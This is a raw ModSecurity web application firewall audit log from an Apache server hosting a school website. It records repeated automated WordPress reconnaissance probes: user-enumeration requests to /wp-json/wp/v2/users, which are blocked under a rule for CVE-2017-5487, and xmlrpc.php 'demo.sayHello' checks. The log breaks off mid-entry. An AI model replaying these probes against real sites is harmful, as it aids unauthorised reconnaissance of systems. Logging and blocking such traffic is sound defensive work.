[uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746836635951735 2447 (- - -) Stopwatch2: 1746836635951735 2447; combined=1134, p1=381, p2=724, p3=0, p4=0, p5=29, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ef78728-Z-- --93d8ec29-A-- [10/May/2025:07:23:59 +0700] aB6cn9r9PbfRBMhzxmRZ4gAAAEg 103.236.140.4 51400 103.236.140.4 8181 --93d8ec29-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.96 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.96 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --93d8ec29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --93d8ec29-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746836639084957 2856 (- - -) Stopwatch2: 1746836639084957 2856; combined=1261, p1=446, p2=784, p3=0, p4=0, p5=31, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93d8ec29-Z-- --4f2bf356-A-- [10/May/2025:07:24:01 +0700] aB6coRLuBiaF9R054QBZYwAAAAM 103.236.140.4 51406 103.236.140.4 8181 --4f2bf356-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.39 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.39 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4f2bf356-C-- demo.sayHello --4f2bf356-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4f2bf356-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746836641951343 6491 (- - -) Stopwatch2: 1746836641951343 6491; combined=4689, p1=582, p2=3774, p3=97, p4=75, p5=96, sr=76, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4f2bf356-Z-- --7033f847-A-- [10/May/2025:07:24:03 +0700] aB6co9r9PbfRBMhzxmRZ4wAAAEk 103.236.140.4 51408 103.236.140.4 8181 --7033f847-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.96 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.96 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7033f847-C-- demo.sayHello --7033f847-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7033f847-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746836643937029 5449 (- - -) Stopwatch2: 1746836643937029 5449; combined=4015, p1=539, p2=3250, p3=26, p4=31, p5=98, sr=135, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7033f847-Z-- --b2326a44-A-- [10/May/2025:07:24:21 +0700] aB6ctdr9PbfRBMhzxmRZ5gAAAEw 103.236.140.4 51414 103.236.140.4 8181 --b2326a44-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.193 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.193 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b2326a44-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b2326a44-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746836661133237 3231 (- - -) Stopwatch2: 1746836661133237 3231; combined=1459, p1=476, p2=951, p3=0, p4=0, p5=32, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b2326a44-Z-- --bc810668-A-- [10/May/2025:07:24:24 +0700] aB6cuNr9PbfRBMhzxmRZ6AAAAE8 103.236.140.4 51418 103.236.140.4 8181 --bc810668-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.193 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.193 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bc810668-C-- demo.sayHello --bc810668-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bc810668-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746836664394400 4508 (- - -) Stopwatch2: 1746836664394400 4508; combined=3519, p1=429, p2=2890, p3=26, p4=24, p5=88, sr=66, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bc810668-Z-- --2b748826-A-- [10/May/2025:07:24:30 +0700] aB6cvtr9PbfRBMhzxmRZ6QAAAFI 103.236.140.4 51422 103.236.140.4 8181 --2b748826-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.204.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.204.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2b748826-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2b748826-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746836670415330 3428 (- - -) Stopwatch2: 1746836670415330 3428; combined=1407, p1=462, p2=914, p3=0, p4=0, p5=31, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2b748826-Z-- --1c56d741-A-- [10/May/2025:07:24:34 +0700] aB6cwhLuBiaF9R054QBZZgAAAAI 103.236.140.4 51434 103.236.140.4 8181 --1c56d741-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.204.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.204.64 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1c56d741-C-- demo.sayHello --1c56d741-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c56d741-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746836674687722 6873 (- - -) Stopwatch2: 1746836674687722 6873; combined=4954, p1=601, p2=3984, p3=39, p4=42, p5=159, sr=76, sw=129, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c56d741-Z-- --a4fd8607-A-- [10/May/2025:07:24:37 +0700] aB6cxci6w7GTj2w44Z6a_QAAAMU 103.236.140.4 51440 103.236.140.4 8181 --a4fd8607-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.102.154 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.102.154 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a4fd8607-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a4fd8607-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746836677954355 2097 (- - -) Stopwatch2: 1746836677954355 2097; combined=954, p1=339, p2=588, p3=0, p4=0, p5=26, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a4fd8607-Z-- --e19bae5c-A-- [10/May/2025:07:24:41 +0700] aB6cyci6w7GTj2w44Z6a_wAAAMo 103.236.140.4 51444 103.236.140.4 8181 --e19bae5c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.102.154 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.102.154 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e19bae5c-C-- demo.sayHello --e19bae5c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e19bae5c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746836681161925 4742 (- - -) Stopwatch2: 1746836681161925 4742; combined=3720, p1=454, p2=3071, p3=23, p4=24, p5=88, sr=65, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e19bae5c-Z-- --6601cb45-A-- [10/May/2025:07:24:41 +0700] aB6cyci6w7GTj2w44Z6bAAAAAMw 103.236.140.4 51446 103.236.140.4 8181 --6601cb45-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.84.188 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.84.188 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6601cb45-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6601cb45-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746836681782369 2483 (- - -) Stopwatch2: 1746836681782369 2483; combined=1154, p1=382, p2=745, p3=0, p4=0, p5=27, sr=111, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6601cb45-Z-- --11b28c03-A-- [10/May/2025:07:24:44 +0700] aB6czKuC4AqLGUOyzyX7OwAAAIk 103.236.140.4 51450 103.236.140.4 8181 --11b28c03-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.152.117.150 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.152.117.150 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --11b28c03-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --11b28c03-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746836684951161 2344 (- - -) Stopwatch2: 1746836684951161 2344; combined=1053, p1=360, p2=666, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11b28c03-Z-- --3579802c-A-- [10/May/2025:07:24:47 +0700] aB6cz8i6w7GTj2w44Z6bAgAAAMs 103.236.140.4 51454 103.236.140.4 8181 --3579802c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.84.188 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.84.188 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3579802c-C-- demo.sayHello --3579802c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3579802c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746836687838342 5316 (- - -) Stopwatch2: 1746836687838342 5316; combined=4055, p1=442, p2=3302, p3=31, p4=27, p5=156, sr=67, sw=97, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3579802c-Z-- --087c5657-A-- [10/May/2025:07:24:49 +0700] aB6c0auC4AqLGUOyzyX7PQAAAIw 103.236.140.4 51456 103.236.140.4 8181 --087c5657-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.204.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.204.171 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --087c5657-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --087c5657-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746836689102405 2111 (- - -) Stopwatch2: 1746836689102405 2111; combined=976, p1=331, p2=619, p3=0, p4=0, p5=26, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --087c5657-Z-- --ce66f157-A-- [10/May/2025:07:24:58 +0700] aB6c2si6w7GTj2w44Z6bBAAAAM4 103.236.140.4 51464 103.236.140.4 8181 --ce66f157-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.204.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.204.171 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ce66f157-C-- demo.sayHello --ce66f157-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce66f157-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746836698740242 5915 (- - -) Stopwatch2: 1746836698740242 5915; combined=4342, p1=569, p2=3535, p3=33, p4=32, p5=100, sr=119, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce66f157-Z-- --5b308874-A-- [10/May/2025:07:25:05 +0700] aB6c4ci6w7GTj2w44Z6bBQAAAM8 103.236.140.4 51468 103.236.140.4 8181 --5b308874-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.83.108 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.83.108 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5b308874-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5b308874-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746836705678789 3182 (- - -) Stopwatch2: 1746836705678789 3182; combined=1416, p1=490, p2=893, p3=0, p4=0, p5=32, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5b308874-Z-- --86f5602c-A-- [10/May/2025:07:25:12 +0700] aB6c6Mi6w7GTj2w44Z6bBgAAANU 103.236.140.4 51472 103.236.140.4 8181 --86f5602c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.83.108 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.83.108 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --86f5602c-C-- demo.sayHello --86f5602c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --86f5602c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746836712350013 6110 (- - -) Stopwatch2: 1746836712350013 6110; combined=4423, p1=605, p2=3584, p3=32, p4=36, p5=98, sr=138, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86f5602c-Z-- --e0e93b38-A-- [10/May/2025:07:25:19 +0700] aB6c78i6w7GTj2w44Z6bBwAAANM 103.236.140.4 51476 103.236.140.4 8181 --e0e93b38-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.59.98 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.59.98 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e0e93b38-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0e93b38-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id 